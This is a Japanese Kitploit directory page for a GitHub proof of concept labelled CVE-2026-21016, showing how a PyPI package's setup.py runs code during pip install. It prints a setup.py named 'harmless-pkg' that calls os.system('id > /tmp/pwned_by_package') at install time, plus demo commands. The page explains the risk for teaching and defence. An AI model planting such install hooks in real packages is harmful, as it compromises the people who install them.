Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution- — 悪意のあるPythonパッケージがsetup.pyを介してpip install中に任意のコマンドを実行する方法を示し、PyPIのサプライチェーンおよびタイポスクワッティングのリスクを強調しています。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-
エクスプロイトサプライチェーンセキュリティ学習と教育ペイロード開発敵対的攻撃
GitHubgeorge0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-

CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution-

悪意のあるPythonパッケージがsetup.pyを介してpip install中に任意のコマンドを実行する方法を示し、PyPIのサプライチェーンおよびタイポスクワッティングのリスクを強調しています。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
16日前未レビュー

CVE-2026-21016 – 悪意のあるPyPIパッケージインストールフック (setup.py の実行)

プログラムコード (Python)

root@kitploit:~
# setup.py - Malicious package that executes during install
from setuptools import setup
import os

# This runs on pip install
os.system('id > /tmp/pwned_by_package')

setup(
    name='harmless-pkg',
    version='1.0',
    packages=[],
)

CVE-2026-21016 – 悪意のあるPyPIパッケージインストールフック (setup.py)

Severity: Critical

概要

PyPIパッケージは、pip install中に実行される任意のコードをsetup.pyに含めることができます。攻撃者は人気のあるパッケージに似た名前のパッケージを公開し(タイポスクワッティング)、インストール時にペイロードがユーザーの権限で実行され、リモートコード実行につながる可能性があります。

脆弱性の詳細

  • タイプ: サプライチェーン攻撃 / コード実行
  • 影響: システムの侵害、認証情報の窃取。
  • 根本原因: pipはsetup.pyをサンドボックスなしで実行するため、パッケージに完全なアクセス権を与えます。

エクスプロイトのデモ

  1. 指定されたsetup.pyを含む悪意のあるパッケージディレクトリを作成します。
  2. ローカルにインストールします:
    root@kitploit:~
    pip install ./harmless-pkg
    
    
  3. 出力を確認します:
    root@kitploit:~
    cat /tmp/pwned_by_package
    

idコマンドが実行されました。

ツールをダウンロード